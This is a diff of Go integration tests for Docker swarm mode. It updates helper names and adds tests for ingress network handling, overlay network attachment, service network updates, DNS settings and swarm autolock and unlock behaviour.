+	out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", "test", "--hostname", "{{.Service.Name}}-{{.Task.Slot}}-{{.Node.Hostname}}", "busybox", "top")
 	c.Assert(err, checker.IsNil, check.Commentf(out))
 
 	// make sure task has been deployed.
-	waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1)
+	waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 1)
 
-	containers := d.activeContainers()
+	containers := d.ActiveContainers(c)
 	out, err = d.Cmd("inspect", "--type", "container", "--format", "{{.Config.Hostname}}", containers[0])
 	c.Assert(err, checker.IsNil, check.Commentf(out))
-	c.Assert(strings.Split(out, "\n")[0], checker.Equals, "test-1", check.Commentf("hostname with templating invalid"))
+	c.Assert(strings.Split(out, "\n")[0], checker.Equals, "test-1-"+strings.Split(hostname, "\n")[0], check.Commentf("hostname with templating invalid"))
 }
 
 // Test case for #24270
@@ -148,15 +190,15 @@ func (s *DockerSwarmSuite) TestSwarmServiceListFilter(c *check.C) {
 	name1 := "redis-cluster-md5"
 	name2 := "redis-cluster"
 	name3 := "other-cluster"
-	out, err := d.Cmd("service", "create", "--name", name1, "busybox", "top")
+	out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", name1, "busybox", "top")
 	c.Assert(err, checker.IsNil)
 	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "")
 
-	out, err = d.Cmd("service", "create", "--name", name2, "busybox", "top")
+	out, err = d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", name2, "busybox", "top")
 	c.Assert(err, checker.IsNil)
 	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "")
 
-	out, err = d.Cmd("service", "create", "--name", name3, "busybox", "top")
+	out, err = d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", name3, "busybox", "top")
 	c.Assert(err, checker.IsNil)
 	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "")
 
@@ -206,12 +248,12 @@ func (s *DockerSwarmSuite) TestSwarmNodeTaskListFilter(c *check.C) {
 	d := s.AddDaemon(c, true, true)
 
 	name := "redis-cluster-md5"
-	out, err := d.Cmd("service", "create", "--name", name, "--replicas=3", "busybox", "top")
+	out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", name, "--replicas=3", "busybox", "top")
 	c.Assert(err, checker.IsNil)
 	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "")
 
 	// make sure task has been deployed.
-	waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 3)
+	waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 3)
 
 	filter := "name=redis-cluster"
 
@@ -232,63 +274,35 @@ func (s *DockerSwarmSuite) TestSwarmNodeTaskListFilter(c *check.C) {
 func (s *DockerSwarmSuite) TestSwarmPublishAdd(c *check.C) {
 	d := s.AddDaemon(c, true, true)
 
-	testCases := []struct {
-		name       string
-		publishAdd []string
-		ports      string
-	}{
-		{
-			name: "simple-syntax",
-			publishAdd: []string{
-				"80:80",
-				"80:80",
-				"80:80",
-				"80:20",
-			},
-			ports: "[{ tcp 80 80 ingress}]",
-		},
-		{
-			name: "complex-syntax",
-			publishAdd: []string{
-				"target=90,published=90,protocol=tcp,mode=ingress",
-				"target=90,published=90,protocol=tcp,mode=ingress",
-				"target=90,published=90,protocol=tcp,mode=ingress",
-				"target=30,published=90,protocol=tcp,mode=ingress",
-			},
-			ports: "[{ tcp 90 90 ingress}]",
-		},
-	}
-
-	for _, tc := range testCases {
-		out, err := d.Cmd("service", "create", "--name", tc.name, "--label", "x=y", "busybox", "top")
-		c.Assert(err, checker.IsNil, check.Commentf(out))
-		c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "")
+	name := "top"
+	out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", name, "--label", "x=y", "busybox", "top")
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "")
 
-		out, err = d.cmdRetryOutOfSequence("service", "update", "--publish-add", tc.publishAdd[0], tc.name)
-		c.Assert(err, checker.IsNil, check.Commentf(out))
+	out, err = d.Cmd("service", "update", "--detach", "--publish-add", "80:80", name)
+	c.Assert(err, checker.IsNil)
 
-		out, err = d.cmdRetryOutOfSequence("service", "update", "--publish-add", tc.publishAdd[1], tc.name)
-		c.Assert(err, checker.IsNil, check.Commentf(out))
+	out, err = d.Cmd("service", "update", "--detach", "--publish-add", "80:80", name)
+	c.Assert(err, checker.IsNil)
 
-		out, err = d.cmdRetryOutOfSequence("service", "update", "--publish-add", tc.publishAdd[2], "--publish-add", tc.publishAdd[3], tc.name)
-		c.Assert(err, checker.NotNil, check.Commentf(out))
+	out, err = d.Cmd("service", "update", "--detach", "--publish-add", "80:80", "--publish-add", "80:20", name)
+	c.Assert(err, checker.NotNil)
 
-		out, err = d.Cmd("service", "inspect", "--format", "{{ .Spec.EndpointSpec.Ports }}", tc.name)
-		c.Assert(err, checker.IsNil)
-		c.Assert(strings.TrimSpace(out), checker.Equals, tc.ports)
-	}
+	out, err = d.Cmd("service", "inspect", "--format", "{{ .Spec.EndpointSpec.Ports }}", name)
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(out), checker.Equals, "[{ tcp 80 80 ingress}]")
 }
 
 func (s *DockerSwarmSuite) TestSwarmServiceWithGroup(c *check.C) {
 	d := s.AddDaemon(c, true, true)
 
 	name := "top"
-	out, err := d.Cmd("service", "create", "--name", name, "--user", "root:root", "--group", "wheel", "--group", "audio", "--group", "staff", "--group", "777", "busybox", "top")
+	out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", name, "--user", "root:root", "--group", "wheel", "--group", "audio", "--group", "staff", "--group", "777", "busybox", "top")
 	c.Assert(err, checker.IsNil)
 	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "")
 
 	// make sure task has been deployed.
-	waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1)
+	waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 1)
 
 	out, err = d.Cmd("ps", "-q")
 	c.Assert(err, checker.IsNil)
@@ -316,7 +330,7 @@ func (s *DockerSwarmSuite) TestSwarmContainerAutoStart(c *check.C) {
 	c.Assert(err, checker.IsNil, check.Commentf(out))
 	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "")
 
-	d.Restart()
+	d.Restart(c)
 
 	out, err = d.Cmd("ps", "-q")
 	c.Assert(err, checker.IsNil, check.Commentf(out))
@@ -330,17 +344,22 @@ func (s *DockerSwarmSuite) TestSwarmContainerEndpointOptions(c *check.C) {
 	c.Assert(err, checker.IsNil, check.Commentf(out))
 	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "")
 
-	_, err = d.Cmd("run", "-d", "--net=foo", "--name=first", "--net-alias=first-alias", "busybox", "top")
+	_, err = d.Cmd("run", "-d", "--net=foo", "--name=first", "--net-alias=first-alias", "busybox:glibc", "top")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	_, err = d.Cmd("run", "-d", "--net=foo", "--name=second", "busybox:glibc", "top")
 	c.Assert(err, checker.IsNil, check.Commentf(out))
 
-	_, err = d.Cmd("run", "-d", "--net=foo", "--name=second", "busybox", "top")
+	_, err = d.Cmd("run", "-d", "--net=foo", "--net-alias=third-alias", "busybox:glibc", "top")
 	c.Assert(err, checker.IsNil, check.Commentf(out))
 
-	// ping first container and its alias
+	// ping first container and its alias, also ping third and anonymous container by its alias
 	_, err = d.Cmd("exec", "second", "ping", "-c", "1", "first")
 	c.Assert(err, check.IsNil, check.Commentf(out))
 	_, err = d.Cmd("exec", "second", "ping", "-c", "1", "first-alias")
 	c.Assert(err, check.IsNil, check.Commentf(out))
+	_, err = d.Cmd("exec", "second", "ping", "-c", "1", "third-alias")
+	c.Assert(err, check.IsNil, check.Commentf(out))
 }
 
 func (s *DockerSwarmSuite) TestSwarmContainerAttachByNetworkId(c *check.C) {
@@ -354,12 +373,12 @@ func (s *DockerSwarmSuite) TestSwarmContainerAttachByNetworkId(c *check.C) {
 	out, err = d.Cmd("run", "-d", "--net", networkID, "busybox", "top")
 	c.Assert(err, checker.IsNil)
 	cID := strings.TrimSpace(out)
-	d.waitRun(cID)
+	d.WaitRun(cID)
 
 	_, err = d.Cmd("rm", "-f", cID)
 	c.Assert(err, checker.IsNil)
 
-	out, err = d.Cmd("network", "rm", "testnet")
+	_, err = d.Cmd("network", "rm", "testnet")
 	c.Assert(err, checker.IsNil)
 
 	checkNetwork := func(*check.C) (interface{}, check.CommentInterface) {
@@ -406,7 +425,7 @@ func (s *DockerSwarmSuite) TestOverlayAttachableOnSwarmLeave(c *check.C) {
 	c.Assert(err, checker.IsNil, check.Commentf(out))
 
 	// Leave the swarm
-	err = d.Leave(true)
+	err = d.SwarmLeave(true)
 	c.Assert(err, checker.IsNil)
 
 	// Check the container is disconnected
@@ -420,14 +439,99 @@ func (s *DockerSwarmSuite) TestOverlayAttachableOnSwarmLeave(c *check.C) {
 	c.Assert(out, checker.Not(checker.Contains), nwName)
 }
 
-func (s *DockerSwarmSuite) TestSwarmRemoveInternalNetwork(c *check.C) {
+func (s *DockerSwarmSuite) TestOverlayAttachableReleaseResourcesOnFailure(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	// Create attachable network
+	out, err := d.Cmd("network", "create", "-d", "overlay", "--attachable", "--subnet", "10.10.9.0/24", "ovnet")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	// Attach a container with specific IP
+	out, err = d.Cmd("run", "-d", "--network", "ovnet", "--name", "c1", "--ip", "10.10.9.33", "busybox", "top")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	// Attempt to attach another container with same IP, must fail
+	_, err = d.Cmd("run", "-d", "--network", "ovnet", "--name", "c2", "--ip", "10.10.9.33", "busybox", "top")
+	c.Assert(err, checker.NotNil)
+
+	// Remove first container
+	out, err = d.Cmd("rm", "-f", "c1")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	// Verify the network can be removed, no phantom network attachment task left over
+	out, err = d.Cmd("network", "rm", "ovnet")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+}
+
+func (s *DockerSwarmSuite) TestSwarmIngressNetwork(c *check.C) {
 	d := s.AddDaemon(c, true, true)
 
-	name := "ingress"
-	out, err := d.Cmd("network", "rm", name)
+	// Ingress network can be removed
+	removeNetwork := func(name string) *icmd.Result {
+		return cli.Docker(
+			cli.Args("-H", d.Sock(), "network", "rm", name),
+			cli.WithStdin(strings.NewReader("Y")))
+	}
+
+	result := removeNetwork("ingress")
+	result.Assert(c, icmd.Success)
+
+	// And recreated
+	out, err := d.Cmd("network", "create", "-d", "overlay", "--ingress", "new-ingress")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	// But only one is allowed
+	out, err = d.Cmd("network", "create", "-d", "overlay", "--ingress", "another-ingress")
 	c.Assert(err, checker.NotNil)
-	c.Assert(strings.TrimSpace(out), checker.Contains, name)
-	c.Assert(strings.TrimSpace(out), checker.Contains, "is a pre-defined network and cannot be removed")
+	c.Assert(strings.TrimSpace(out), checker.Contains, "is already present")
+
+	// It cannot be removed if it is being used
+	out, err = d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", "srv1", "-p", "9000:8000", "busybox", "top")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	result = removeNetwork("new-ingress")
+	result.Assert(c, icmd.Expected{
+		ExitCode: 1,
+		Err:      "ingress network cannot be removed because service",
+	})
+
+	// But it can be removed once no more services depend on it
+	out, err = d.Cmd("service", "update", "--detach", "--publish-rm", "9000:8000", "srv1")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	result = removeNetwork("new-ingress")
+	result.Assert(c, icmd.Success)
+
+	// A service which needs the ingress network cannot be created if no ingress is present
+	out, err = d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", "srv2", "-p", "500:500", "busybox", "top")
+	c.Assert(err, checker.NotNil)
+	c.Assert(strings.TrimSpace(out), checker.Contains, "no ingress network is present")
+
+	// An existing service cannot be updated to use the ingress nw if the nw is not present
+	out, err = d.Cmd("service", "update", "--detach", "--publish-add", "9000:8000", "srv1")
+	c.Assert(err, checker.NotNil)
+	c.Assert(strings.TrimSpace(out), checker.Contains, "no ingress network is present")
+
+	// But services which do not need routing mesh can be created regardless
+	out, err = d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", "srv3", "--endpoint-mode", "dnsrr", "busybox", "top")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+}
+
+func (s *DockerSwarmSuite) TestSwarmCreateServiceWithNoIngressNetwork(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	// Remove ingress network
+	result := cli.Docker(
+		cli.Args("-H", d.Sock(), "network", "rm", "ingress"),
+		cli.WithStdin(strings.NewReader("Y")))
+	result.Assert(c, icmd.Success)
+
+	// Create a overlay network and launch a service on it
+	// Make sure nothing panics because ingress network is missing
+	out, err := d.Cmd("network", "create", "-d", "overlay", "another-network")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	out, err = d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", "srv4", "--network", "another-network", "busybox", "top")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
 }
 
 // Test case for #24108, also the case from:
@@ -436,7 +540,7 @@ func (s *DockerSwarmSuite) TestSwarmTaskListFilter(c *check.C) {
 	d := s.AddDaemon(c, true, true)
 
 	name := "redis-cluster-md5"
-	out, err := d.Cmd("service", "create", "--name", name, "--replicas=3", "busybox", "top")
+	out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", name, "--replicas=3", "busybox", "top")
 	c.Assert(err, checker.IsNil)
 	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "")
 
@@ -470,7 +574,7 @@ func (s *DockerSwarmSuite) TestSwarmTaskListFilter(c *check.C) {
 	c.Assert(out, checker.Not(checker.Contains), name+".3")
 
 	name = "redis-cluster-sha1"
-	out, err = d.Cmd("service", "create", "--name", name, "--mode=global", "busybox", "top")
+	out, err = d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", name, "--mode=global", "busybox", "top")
 	c.Assert(err, checker.IsNil)
 	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "")
 
@@ -499,12 +603,12 @@ func (s *DockerSwarmSuite) TestPsListContainersFilterIsTask(c *check.C) {
 	bareID := strings.TrimSpace(out)[:12]
 	// Create a service
 	name := "busybox-top"
-	out, err = d.Cmd("service", "create", "--name", name, "busybox", "top")
+	out, err = d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", name, "busybox", "top")
 	c.Assert(err, checker.IsNil)
 	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "")
 
 	// make sure task has been deployed.
-	waitAndAssert(c, defaultReconciliationTimeout, d.checkServiceRunningTasks(name), checker.Equals, 1)
+	waitAndAssert(c, defaultReconciliationTimeout, d.CheckServiceRunningTasks(name), checker.Equals, 1)
 
 	// Filter non-tasks
 	out, err = d.Cmd("ps", "-a", "-q", "--filter=is-task=false")
@@ -713,12 +817,12 @@ func (s *DockerSwarmSuite) TestSwarmNetworkPlugin(c *check.C) {
 func (s *DockerSwarmSuite) TestSwarmServiceEnvFile(c *check.C) {
 	d := s.AddDaemon(c, true, true)
 
-	path := filepath.Join(d.folder, "env.txt")
+	path := filepath.Join(d.Folder, "env.txt")
 	err := ioutil.WriteFile(path, []byte("VAR1=A\nVAR2=A\n"), 0644)
 	c.Assert(err, checker.IsNil)
 
 	name := "worker"
-	out, err := d.Cmd("service", "create", "--env-file", path, "--env", "VAR1=B", "--env", "VAR1=C", "--env", "VAR2=", "--env", "VAR2", "--name", name, "busybox", "top")
+	out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--env-file", path, "--env", "VAR1=B", "--env", "VAR1=C", "--env", "VAR2=", "--env", "VAR2", "--name", name, "busybox", "top")
 	c.Assert(err, checker.IsNil)
 	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "")
 
@@ -737,14 +841,14 @@ func (s *DockerSwarmSuite) TestSwarmServiceTTY(c *check.C) {
 
 	// Without --tty
 	expectedOutput := "none"
-	out, err := d.Cmd("service", "create", "--name", name, "busybox", "sh", "-c", ttyCheck)
+	out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", name, "busybox", "sh", "-c", ttyCheck)
 	c.Assert(err, checker.IsNil)
 
 	// Make sure task has been deployed.
-	waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1)
+	waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 1)
 
 	// We need to get the container id.
-	out, err = d.Cmd("ps", "-a", "-q", "--no-trunc")
+	out, err = d.Cmd("ps", "-q", "--no-trunc")
 	c.Assert(err, checker.IsNil)
 	id := strings.TrimSpace(out)
 
@@ -756,18 +860,18 @@ func (s *DockerSwarmSuite) TestSwarmServiceTTY(c *check.C) {
 	out, err = d.Cmd("service", "rm", name)
 	c.Assert(err, checker.IsNil)
 	// Make sure container has been destroyed.
-	waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 0)
+	waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 0)
 
 	// With --tty
 	expectedOutput = "TTY"
-	out, err = d.Cmd("service", "create", "--name", name, "--tty", "busybox", "sh", "-c", ttyCheck)
+	out, err = d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", name, "--tty", "busybox", "sh", "-c", ttyCheck)
 	c.Assert(err, checker.IsNil)
 
 	// Make sure task has been deployed.
-	waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1)
+	waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 1)
 
 	// We need to get the container id.
-	out, err = d.Cmd("ps", "-a", "-q", "--no-trunc")
+	out, err = d.Cmd("ps", "-q", "--no-trunc")
 	c.Assert(err, checker.IsNil)
 	id = strings.TrimSpace(out)
 
@@ -781,17 +885,17 @@ func (s *DockerSwarmSuite) TestSwarmServiceTTYUpdate(c *check.C) {
 
 	// Create a service
 	name := "top"
-	_, err := d.Cmd("service", "create", "--name", name, "busybox", "top")
+	_, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", name, "busybox", "top")
 	c.Assert(err, checker.IsNil)
 
 	// Make sure task has been deployed.
-	waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1)
+	waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 1)
 
 	out, err := d.Cmd("service", "inspect", "--format", "{{ .Spec.TaskTemplate.ContainerSpec.TTY }}", name)
 	c.Assert(err, checker.IsNil)
 	c.Assert(strings.TrimSpace(out), checker.Equals, "false")
 
-	_, err = d.Cmd("service", "update", "--tty", name)
+	_, err = d.Cmd("service", "update", "--detach", "--tty", name)
 	c.Assert(err, checker.IsNil)
 
 	out, err = d.Cmd("service", "inspect", "--format", "{{ .Spec.TaskTemplate.ContainerSpec.TTY }}", name)
@@ -799,16 +903,55 @@ func (s *DockerSwarmSuite) TestSwarmServiceTTYUpdate(c *check.C) {
 	c.Assert(strings.TrimSpace(out), checker.Equals, "true")
 }
 
+func (s *DockerSwarmSuite) TestSwarmServiceNetworkUpdate(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	result := icmd.RunCmd(d.Command("network", "create", "-d", "overlay", "foo"))
+	result.Assert(c, icmd.Success)
+	fooNetwork := strings.TrimSpace(string(result.Combined()))
+
+	result = icmd.RunCmd(d.Command("network", "create", "-d", "overlay", "bar"))
+	result.Assert(c, icmd.Success)
+	barNetwork := strings.TrimSpace(string(result.Combined()))
+
+	result = icmd.RunCmd(d.Command("network", "create", "-d", "overlay", "baz"))
+	result.Assert(c, icmd.Success)
+	bazNetwork := strings.TrimSpace(string(result.Combined()))
+
+	// Create a service
+	name := "top"
+	result = icmd.RunCmd(d.Command("service", "create", "--detach", "--no-resolve-image", "--network", "foo", "--network", "bar", "--name", name, "busybox", "top"))
+	result.Assert(c, icmd.Success)
+
+	// Make sure task has been deployed.
+	waitAndAssert(c, defaultReconciliationTimeout, d.CheckRunningTaskNetworks, checker.DeepEquals,
+		map[string]int{fooNetwork: 1, barNetwork: 1})
+
+	// Remove a network
+	result = icmd.RunCmd(d.Command("service", "update", "--detach", "--network-rm", "foo", name))
+	result.Assert(c, icmd.Success)
+
+	waitAndAssert(c, defaultReconciliationTimeout, d.CheckRunningTaskNetworks, checker.DeepEquals,
+		map[string]int{barNetwork: 1})
+
+	// Add a network
+	result = icmd.RunCmd(d.Command("service", "update", "--detach", "--network-add", "baz", name))
+	result.Assert(c, icmd.Success)
+
+	waitAndAssert(c, defaultReconciliationTimeout, d.CheckRunningTaskNetworks, checker.DeepEquals,
+		map[string]int{barNetwork: 1, bazNetwork: 1})
+}
+
 func (s *DockerSwarmSuite) TestDNSConfig(c *check.C) {
 	d := s.AddDaemon(c, true, true)
 
 	// Create a service
 	name := "top"
-	_, err := d.Cmd("service", "create", "--name", name, "--dns=1.2.3.4", "--dns-search=example.com", "--dns-option=timeout:3", "busybox", "top")
+	_, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", name, "--dns=1.2.3.4", "--dns-search=example.com", "--dns-option=timeout:3", "busybox", "top")
 	c.Assert(err, checker.IsNil)
 
 	// Make sure task has been deployed.
-	waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1)
+	waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 1)
 
 	// We need to get the container id.
 	out, err := d.Cmd("ps", "-a", "-q", "--no-trunc")
@@ -831,13 +974,13 @@ func (s *DockerSwarmSuite) TestDNSConfigUpdate(c *check.C) {
 
 	// Create a service
 	name := "top"
-	_, err := d.Cmd("service", "create", "--name", name, "busybox", "top")
+	_, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", name, "busybox", "top")
 	c.Assert(err, checker.IsNil)
 
 	// Make sure task has been deployed.
-	waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1)
+	waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 1)
 
-	_, err = d.Cmd("service", "update", "--dns-add=1.2.3.4", "--dns-search-add=example.com", "--dns-option-add=timeout:3", name)
+	_, err = d.Cmd("service", "update", "--detach", "--dns-add=1.2.3.4", "--dns-search-add=example.com", "--dns-option-add=timeout:3", name)
 	c.Assert(err, checker.IsNil)
 
 	out, err := d.Cmd("service", "inspect", "--format", "{{ .Spec.TaskTemplate.ContainerSpec.DNSConfig }}", name)
@@ -845,6 +988,68 @@ func (s *DockerSwarmSuite) TestDNSConfigUpdate(c *check.C) {
 	c.Assert(strings.TrimSpace(out), checker.Equals, "{[1.2.3.4] [example.com] [timeout:3]}")
 }
 
+func getNodeStatus(c *check.C, d *daemon.Daemon) swarm.LocalNodeState {
+	info := d.SwarmInfo(c)
+	return info.LocalNodeState
+}
+
+func checkKeyIsEncrypted(d *daemon.Daemon) func(*check.C) (interface{}, check.CommentInterface) {
+	return func(c *check.C) (interface{}, check.CommentInterface) {
+		keyBytes, err := ioutil.ReadFile(filepath.Join(d.Folder, "root", "swarm", "certificates", "swarm-node.key"))
+		if err != nil {
+			return fmt.Errorf("error reading key: %v", err), nil
+		}
+
+		keyBlock, _ := pem.Decode(keyBytes)
+		if keyBlock == nil {
+			return fmt.Errorf("invalid PEM-encoded private key"), nil
+		}
+
+		return keyutils.IsEncryptedPEMBlock(keyBlock), nil
+	}
+}
+
+func checkSwarmLockedToUnlocked(c *check.C, d *daemon.Daemon, unlockKey string) {
+	// Wait for the PEM file to become unencrypted
+	waitAndAssert(c, defaultReconciliationTimeout, checkKeyIsEncrypted(d), checker.Equals, false)
+
+	d.Restart(c)
+	c.Assert(getNodeStatus(c, d), checker.Equals, swarm.LocalNodeStateActive)
+}
+
+func checkSwarmUnlockedToLocked(c *check.C, d *daemon.Daemon) {
+	// Wait for the PEM file to become encrypted
+	waitAndAssert(c, defaultReconciliationTimeout, checkKeyIsEncrypted(d), checker.Equals, true)
+
+	d.Restart(c)
+	c.Assert(getNodeStatus(c, d), checker.Equals, swarm.LocalNodeStateLocked)
+}
+
+func (s *DockerSwarmSuite) TestUnlockEngineAndUnlockedSwarm(c *check.C) {
+	d := s.AddDaemon(c, false, false)
+
+	// unlocking a normal engine should return an error - it does not even ask for the key
+	cmd := d.Command("swarm", "unlock")
+	result := icmd.RunCmd(cmd)
+	result.Assert(c, icmd.Expected{
+		ExitCode: 1,
+	})
+	c.Assert(result.Combined(), checker.Contains, "Error: This node is not part of a swarm")
+	c.Assert(result.Combined(), checker.Not(checker.Contains), "Please enter unlock key")
+
+	_, err := d.Cmd("swarm", "init")
+	c.Assert(err, checker.IsNil)
+
+	// unlocking an unlocked swarm should return an error - it does not even ask for the key
+	cmd = d.Command("swarm", "unlock")
+	result = icmd.RunCmd(cmd)
+	result.Assert(c, icmd.Expected{
+		ExitCode: 1,
+	})
+	c.Assert(result.Combined(), checker.Contains, "Error: swarm is not locked")
+	c.Assert(result.Combined(), checker.Not(checker.Contains), "Please enter unlock key")
+}
+
 func (s *DockerSwarmSuite) TestSwarmInitLocked(c *check.C) {
 	d := s.AddDaemon(c, false, false)
 
@@ -866,30 +1071,26 @@ func (s *DockerSwarmSuite) TestSwarmInitLocked(c *check.C) {
 	outs, err = d.Cmd("swarm", "unlock-key", "-q")
 	c.Assert(outs, checker.Equals, unlockKey+"\n")
 
-	info, err := d.info()
-	c.Assert(err, checker.IsNil)
-	c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive)
+	c.Assert(getNodeStatus(c, d), checker.Equals, swarm.LocalNodeStateActive)
 
-	c.Assert(d.Restart(), checker.IsNil)
-
-	info, err = d.info()
-	c.Assert(err, checker.IsNil)
-	c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateLocked)
+	// It starts off locked
+	d.Restart(c)
+	c.Assert(getNodeStatus(c, d), checker.Equals, swarm.LocalNodeStateLocked)
 
-	cmd := d.command("swarm", "unlock")
+	cmd := d.Command("swarm", "unlock")
 	cmd.Stdin = bytes.NewBufferString("wrong-secret-key")
-	out, err := cmd.CombinedOutput()
-	c.Assert(err, checker.NotNil, check.Commentf("out: %v", string(out)))
-	c.Assert(string(out), checker.Contains, "invalid key")
+	icmd.RunCmd(cmd).Assert(c, icmd.Expected{
+		ExitCode: 1,
+		Err:      "invalid key",
+	})
 
-	cmd = d.command("swarm", "unlock")
+	c.Assert(getNodeStatus(c, d), checker.Equals, swarm.LocalNodeStateLocked)
+
+	cmd = d.Command("swarm", "unlock")
 	cmd.Stdin = bytes.NewBufferString(unlockKey)
-	out, err = cmd.CombinedOutput()
-	c.Assert(err, checker.IsNil, check.Commentf("out: %v", string(out)))
+	icmd.RunCmd(cmd).Assert(c, icmd.Success)
 
-	info, err = d.info()
-	c.Assert(err, checker.IsNil)
-	c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive)
+	c.Assert(getNodeStatus(c, d), checker.Equals, swarm.LocalNodeStateActive)
 
 	outs, err = d.Cmd("node", "ls")
 	c.Assert(err, checker.IsNil)
@@ -898,14 +1099,7 @@ func (s *DockerSwarmSuite) TestSwarmInitLocked(c *check.C) {
 	outs, err = d.Cmd("swarm", "update", "--autolock=false")
 	c.Assert(err, checker.IsNil, check.Commentf("out: %v", outs))
 
-	// Wait for autolock to be turned off
-	time.Sleep(time.Second)
-
-	c.Assert(d.Restart(), checker.IsNil)
-
-	info, err = d.info()
-	c.Assert(err, checker.IsNil)
-	c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive)
+	checkSwarmLockedToUnlocked(c, d, unlockKey)
 
 	outs, err = d.Cmd("node", "ls")
 	c.Assert(err, checker.IsNil)
@@ -918,30 +1112,181 @@ func (s *DockerSwarmSuite) TestSwarmLeaveLocked(c *check.C) {
 	outs, err := d.Cmd("swarm", "init", "--autolock")
 	c.Assert(err, checker.IsNil, check.Commentf("out: %v", outs))
 
-	c.Assert(d.Restart("--swarm-default-advertise-addr=lo"), checker.IsNil)
+	// It starts off locked
+	d.Restart(c, "--swarm-default-advertise-addr=lo")
 
-	info, err := d.info()
-	c.Assert(err, checker.IsNil)
+	info := d.SwarmInfo(c)
 	c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateLocked)
 
 	outs, _ = d.Cmd("node", "ls")
 	c.Assert(outs, checker.Contains, "Swarm is encrypted and needs to be unlocked")
 
+	// `docker swarm leave` a locked swarm without --force will return an error
+	outs, _ = d.Cmd("swarm", "leave")
+	c.Assert(outs, checker.Contains, "Swarm is encrypted and locked.")
+
+	// It is OK for user to leave a locked swarm with --force
 	outs, err = d.Cmd("swarm", "leave", "--force")
 	c.Assert(err, checker.IsNil, check.Commentf("out: %v", outs))
 
-	info, err = d.info()
-	c.Assert(err, checker.IsNil)
+	info = d.SwarmInfo(c)
 	c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateInactive)
 
 	outs, err = d.Cmd("swarm", "init")
 	c.Assert(err, checker.IsNil, check.Commentf("out: %v", outs))
 
-	info, err = d.info()
-	c.Assert(err, checker.IsNil)
+	info = d.SwarmInfo(c)
 	c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive)
 }
 
